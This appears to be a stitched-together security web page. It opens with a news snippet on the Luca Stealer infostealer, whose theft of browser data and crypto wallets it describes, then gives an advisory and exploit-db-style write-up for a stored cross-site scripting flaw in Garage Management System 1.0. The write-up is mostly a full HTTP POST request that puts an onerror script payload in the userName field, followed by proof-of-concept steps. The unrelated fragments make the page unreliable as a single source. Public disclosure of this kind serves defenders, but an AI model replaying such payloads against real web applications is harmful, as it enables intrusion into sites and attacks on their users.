Less than a month later, there are already more than 25 Luca Stealer samples making the rounds, developed by multiple threat actors. And there will likely be even more, given that the original author continued to update the GitHub code, and has provided helpful tips on how to modify it for crime and profit.

Luca Stealer has a host of concerning capabilities, including the ability to lift data from Chromium-based browsers, exfiltrate files, and steal information from messaging applications and cryptowallets. In current observed campaigns, cybercriminals are especially going after crypto enthusiasts, according to Cyble.

ICYMI: Dark Web Happenings Edition With Evil Corp., MSP Targeting & More

A vulnerability, which was classified as problematic, was found in SourceCodester Garage Management System 1.0. Affected is an unknown function of the file /php_action/createUser.php. The manipulation of the argument userName with the input lala<img src="" onerror=alert(1)> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

Permalink

**Garage Management System - user\_info 'userName' Stored Cross-Site Scripting(XSS)****Exploit Title: Garage Management System - user\_info 'userName' Stored Cross-Site Scripting(XSS)****Exploit Author: webraybtl@webray.com.cn inc****Vendor Homepage: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html****Software Link:https://www.sourcecodester.com/download-code?nid=15485&title=Garage+Management+System+using+PHP%2FMySQL+Free+Source+Code****Version: Garage Management System 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description**

Persistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Garage Management System does not filter the content correctly at the "userName" parameter, resulting in the generation of stored XSS.

**Payload used:**

    POST /php_action/createUser.php HTTP/1.1
    Host: 192.168.67.9
    Content-Length: 565
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.67.9
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUD1Yb96WGEg9mpcD
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.67.9/add-user.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    Cookie: PHPSESSID=sv8b900m4au6g31guodelu6tc9
    Connection: close
    
    ------WebKitFormBoundaryUD1Yb96WGEg9mpcD
    Content-Disposition: form-data; name="currnt_date"
    
    
    ------WebKitFormBoundaryUD1Yb96WGEg9mpcD
    Content-Disposition: form-data; name="userName"
    
    lala<img src="" onerror=alert(1)>
    ------WebKitFormBoundaryUD1Yb96WGEg9mpcD
    Content-Disposition: form-data; name="upassword"
    
    123
    ------WebKitFormBoundaryUD1Yb96WGEg9mpcD
    Content-Disposition: form-data; name="uemail"
    
    123@qq.com
    ------WebKitFormBoundaryUD1Yb96WGEg9mpcD
    Content-Disposition: form-data; name="create"
    
    
    ------WebKitFormBoundaryUD1Yb96WGEg9mpcD--
    
    
    

**Proof of Concept**

1.  Send payload
    
2.  Open Page http://192.168.67.9/users.php，We can see the alert.

Tag

#chrome